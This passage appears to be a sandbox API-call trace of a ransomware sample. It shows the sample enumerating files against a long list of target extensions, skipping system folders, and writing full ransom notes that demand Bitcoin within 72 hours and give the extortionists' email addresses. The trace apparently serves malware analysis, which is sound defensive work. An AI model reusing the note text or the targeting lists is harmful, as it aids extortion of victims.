adme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.902] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x50b35838, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x50b35838, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x650b07ef, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1876, dwReserved0=0x0, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 1
	[0177.902] lstrcmpW (lpString1="nslist.hxl", lpString2="..") returned 1
	[0177.902] lstrcmpW (lpString1="nslist.hxl", lpString2=".") returned 1
	[0177.903] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.903] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="nslist.hxl" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl"
	[0177.903] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned 44
	[0177.903] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.903] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft help\\nslist.hxl") returned 0x2c
	[0177.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.903] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\nslist.hxl", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.903] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\nslist.hxl" | out: lpString1="c:\\users\\all users\\microsoft help\\nslist.hxl") returned="c:\\users\\all users\\microsoft help\\nslist.hxl"
	[0177.904] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\nslist.hxl") returned 44
	[0177.904] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.904] StrStrW (lpFirst=".hxl", lpSrch=".") returned=".hxl"
	[0177.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.904] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxl") returned 0x0
	[0177.905] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x50b35838, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x50b35838, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x650b07ef, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1876, dwReserved0=0x0, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 0
	[0177.905] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0177.907] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0177.908] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Microsoft Help" | out: lpString1="C:\\Users\\All Users\\Microsoft Help") returned="C:\\Users\\All Users\\Microsoft Help"
	[0177.908] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\*.*") returned="C:\\Users\\All Users\\Microsoft Help\\*.*"
	[0177.908] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.908] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.908] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\HELP_DECRYPT_YOUR_FILES.TXT") returned 61
	[0177.908] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft help\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0177.919] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.919] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.922] CloseHandle (hObject=0x380) returned 1
	[0177.922] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.923] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0177.924] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.924] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft help\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0177.925] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.925] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.925] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0177.925] CloseHandle (hObject=0x380) returned 1
	[0177.926] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.926] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.926] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.926] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\HELP_DECRYPT_YOUR_FILES.HTML") returned 62
	[0177.926] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft help\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0177.927] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.927] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0177.930] CloseHandle (hObject=0x380) returned 1
	[0177.930] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.930] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.931] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.931] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0177.933] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.933] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft help\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0177.933] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.933] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.933] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0177.934] CloseHandle (hObject=0x380) returned 1
	[0177.934] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help\\*.*" (normalized: "c:\\users\\all users\\microsoft help\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x506a2e14, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xfd4aa69b, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8394b6ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.934] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\*.*") returned 37
	[0177.934] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.935] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\*.*", cchLength=0x25 | out: lpsz="c:\\users\\all users\\microsoft help\\*.*") returned 0x25
	[0177.935] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.935] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="windows") returned 0x0
	[0177.935] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.935] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="boot") returned 0x0
	[0177.936] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.936] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="system volume information") returned 0x0
	[0177.936] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.936] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.936] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.936] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="temp") returned 0x0
	[0177.937] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="program files") returned 0x0
	[0177.937] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.937] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="appdata") returned 0x0
	[0177.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.938] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="application data") returned 0x0
	[0177.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.938] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="winnt") returned 0x0
	[0177.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.938] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="tmp") returned 0x0
	[0177.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
